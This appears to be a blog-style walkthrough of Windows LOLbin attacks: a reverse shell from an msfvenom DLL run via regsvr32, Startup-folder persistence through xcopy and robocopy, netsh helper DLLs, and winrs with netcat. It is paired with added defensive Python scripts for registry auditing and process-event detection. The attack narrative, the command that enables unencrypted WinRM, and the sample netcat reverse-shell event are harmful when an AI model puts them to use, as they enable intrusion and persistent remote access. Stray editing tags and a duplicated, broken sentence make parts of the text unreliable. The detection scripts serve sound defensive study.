Some instances of LOLbins that I've looked at and found, run on a fully patched Windows 10 host connecting back to a Kali machine.

First run this to bypass AMSI. Then work out which AV engine your target uses and bypass it using one of these.

Reverse Shell .dll

Using msfvenom to generate a .dll that calls back with a TCP reverse shell.


Contents of trix.bat, which runs the previously generated .dll via regsvr32.exe.

Xcopy then copies this .bat file into the C:\Users\IEUser\Start Menu\Programs\Startup directory; files placed in this directory are launched at startup and executed for that user.

When the user then logs on, this .bat is executed, which in turn runs the .dll and spawns the reverse shell.


Robocopy then copies from a network share at \\ropnop\roprobo. Robocopy copies a whole directory, and that directory contains the trix.bat and trix.dll files.

As can be seen, this then causes the reverse shell to execute.
</gml_replace>
<gr_replace lines="22" cat="clarify" orig="Netsh has">
Netsh has a feature that can be abused: it loads 'helper' DLLs, and it is able to load the previously generated msfvenom .dll.


Netsh has a function that is possible to load, that isit can load 'helper' dll's, and it is able to load the previously generated msfvenom dll

Additionally it is possible to gain persistence on a machine by running netsh.exe, which will then load the helper .dll whenever it is started.
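The helpers netsh loads at start-up are registered as values under HKLM\SOFTWARE\Microsoft\NetSh, which is also where a defender can audit them. The script below is an added example written for these notes (not code from the original post): it flags any registered helper that is given as a full path outside System32, or as a bare file name that System32 does not actually contain. The registry reader only runs on Windows; elsewhere it falls back to a constructed sample that includes a hypothetical planted trix.dll entry. The System32 location is assumed to be C:\Windows\System32.

```python
"""Audit registered netsh helper DLLs for planted persistence entries.

Added example, not part of the original notes. netsh.exe loads every DLL
registered as a value under HKLM\\SOFTWARE\\Microsoft\\NetSh each time it
starts; legitimate helpers are bare file names that live in System32.
"""
import ntpath
import sys

SYSTEM32 = r"C:\Windows\System32"   # assumption: default Windows install path


def classify_helper(name, value, system32_dlls):
    """Return a reason string if the helper entry looks suspicious, else None.

    name          -- registry value name (the helper's short name)
    value         -- registry value data: a DLL file name or a full path
    system32_dlls -- set of lowercase DLL file names present in System32
    """
    data = value.strip().strip('"')
    directory, filename = ntpath.split(data)
    if not filename.lower().endswith(".dll"):
        return f"{name}: helper '{data}' is not a .dll"
    if directory:
        # A path was supplied; only System32 is an expected location.
        if ntpath.normcase(ntpath.normpath(directory)) != ntpath.normcase(SYSTEM32):
            return f"{name}: helper loaded from outside System32 ({data})"
    if filename.lower() not in system32_dlls:
        # Bare name missing from System32: it would be resolved through the DLL
        # search order, so a DLL dropped elsewhere on the path would be loaded.
        return f"{name}: helper '{filename}' not found in System32"
    return None


def find_suspicious_netsh_helpers(entries, system32_dlls):
    """Run classify_helper over every registered helper and collect findings."""
    findings = []
    for name, value in entries.items():
        reason = classify_helper(name, value, system32_dlls)
        if reason:
            findings.append(reason)
    return findings


def read_helpers_from_registry():
    """Read the live NetSh key (Windows only: winreg does not exist elsewhere)."""
    import winreg
    entries = {}
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"SOFTWARE\Microsoft\NetSh") as key:
        index = 0
        while True:
            try:
                name, value, _ = winreg.EnumValue(key, index)
            except OSError:
                break   # no more values
            entries[name] = value
            index += 1
    return entries


# Constructed sample data: three genuine Microsoft helpers plus two planted ones.
SAMPLE_ENTRIES = {
    "ifmon": "ifmon.dll",
    "dhcpmon": "dhcpmon.dll",
    "fwcfg": "fwcfg.dll",
    "trix": r"C:\Users\IEUser\Downloads\trix.dll",   # hypothetical planted helper
    "upd": "updhelper.dll",                          # hypothetical name absent from System32
}
SAMPLE_SYSTEM32 = {"ifmon.dll", "dhcpmon.dll", "fwcfg.dll"}   # constructed listing

if __name__ == "__main__":
    if sys.platform == "win32":
        import os
        entries = read_helpers_from_registry()
        system32 = {f.lower() for f in os.listdir(SYSTEM32) if f.lower().endswith(".dll")}
    else:
        entries, system32 = SAMPLE_ENTRIES, SAMPLE_SYSTEM32
    for finding in find_suspicious_netsh_helpers(entries, system32):
        print("SUSPICIOUS", finding)
```

On a clean host the live run should print nothing; any output is worth checking against the file's signature and creation time, since a helper registered here survives reboots and is loaded by an otherwise trusted Microsoft binary.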


To allow winrs to be used, it is necessary to enable it first, which is possible through the following command - winrm quickconfig -quiet & winrm set winrm/config/Client @{AllowUnencrypted = "true"}

You can then use winrs to run commands via localhost; here I used a netcat executable, nc64.exe, to get a reverse shell, however you could use regsvr32.exe or another LOLbin to execute a command.
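Every step in these notes leaves a process-creation event behind, and the AllowUnencrypted setting above is itself a hardening regression worth alerting on (it permits WinRM over plain HTTP). The script below is an added example for these notes (not code from the original post) that runs a handful of detection rules over Sysmon-style process events: copy tools writing into a Start Menu\Programs\Startup folder, regsvr32 loading a DLL from a user-writable or UNC path, a command line setting AllowUnencrypted to true, a WinRM host process spawning a binary from outside C:\Windows, and netsh registering a helper. The events are constructed inline in the shape of Sysmon Event ID 1 fields (Image, ParentImage, CommandLine); the hosts, paths and the 192.0.2.10 address are sample values.

```python
"""Detect the LOLbin execution and persistence chain from process-creation events.

Added example, not from the original notes. Input events are constructed below
in a Sysmon Event ID 1 shape; in production they would come from Sysmon or
Security 4688 with command-line auditing enabled.
"""
import re

STARTUP_DIR = re.compile(r"\\start menu\\programs\\startup", re.IGNORECASE)
# Locations a standard user can write to: profile directories and UNC shares.
USER_WRITABLE = re.compile(r"[a-z]:\\users\\|\\\\[a-z0-9]", re.IGNORECASE)
ALLOW_UNENCRYPTED = re.compile(r'allowunencrypted\s*=\s*"?true', re.IGNORECASE)
NETSH_ADD_HELPER = re.compile(r"\badd\s+helper\b", re.IGNORECASE)
COPY_TOOLS = {"xcopy.exe", "robocopy.exe"}
WINRM_HOSTS = {"winrshost.exe", "wsmprovhost.exe"}   # WinRM child-process hosts


def basename(path):
    """Lower-case file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def evaluate_event(event):
    """Return the list of rule names this event matches (empty if benign)."""
    image = basename(event["Image"])
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    hits = []
    # 1. Copy tool writing into a per-user Startup folder (logon persistence).
    if image in COPY_TOOLS and STARTUP_DIR.search(cmd):
        hits.append("copy_to_startup_folder")
    # 2. regsvr32 given a DLL under a user profile or on a network share.
    if image == "regsvr32.exe" and USER_WRITABLE.search(cmd):
        hits.append("regsvr32_dll_from_user_writable_path")
    # 3. WinRM client told to accept unencrypted transport.
    if ALLOW_UNENCRYPTED.search(cmd):
        hits.append("winrm_allow_unencrypted_enabled")
    # 4. WinRM host launching something that is not a Windows binary.
    if parent in WINRM_HOSTS and not event["Image"].lower().startswith("c:\\windows\\"):
        hits.append("winrm_host_spawned_non_system_binary")
    # 5. netsh registering a new helper DLL.
    if image == "netsh.exe" and NETSH_ADD_HELPER.search(cmd):
        hits.append("netsh_add_helper")
    return hits


def scan_events(events):
    """Return (image name, matched rules) for every event that matched a rule."""
    findings = []
    for event in events:
        hits = evaluate_event(event)
        if hits:
            findings.append((basename(event["Image"]), hits))
    return findings


# Constructed sample events mirroring the steps in the notes above.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\xcopy.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'xcopy trix.bat "C:\Users\IEUser\Start Menu\Programs\Startup"'},
    {"Image": r"C:\Windows\System32\regsvr32.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'regsvr32.exe /s "C:\Users\IEUser\Start Menu\Programs\Startup\trix.dll"'},
    {"Image": r"C:\Windows\System32\Robocopy.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'robocopy \\ropnop\roprobo "C:\Users\IEUser\Start Menu\Programs\Startup" /E'},
    {"Image": r"C:\Windows\System32\cscript.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cscript //nologo "C:\Windows\System32\winrm.vbs" set winrm/config/Client @{AllowUnencrypted = "true"}'},
    {"Image": r"C:\Users\IEUser\Downloads\nc64.exe", "ParentImage": r"C:\Windows\System32\winrshost.exe",
     "CommandLine": "nc64.exe 192.0.2.10 4444"},
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\System32\winrshost.exe",
     "CommandLine": r'cmd.exe /c "hostname"'},           # normal winrs usage: no alert
    {"Image": r"C:\Windows\System32\netsh.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"netsh add helper C:\Users\IEUser\trix.dll"},
    {"Image": r"C:\Windows\System32\xcopy.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"xcopy C:\data\report.docx D:\backup"},   # benign copy: no alert
]

if __name__ == "__main__":
    for image, rules in scan_events(SAMPLE_EVENTS):
        print(f"{image}: {', '.join(rules)}")
```

Rule 4 deliberately lets cmd.exe from System32 through, because that is what every ordinary winrs command looks like; the signal is a child that lives under a user profile or a share, which is exactly where the nc64.exe in these notes sits.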

References: Azeria's Persistence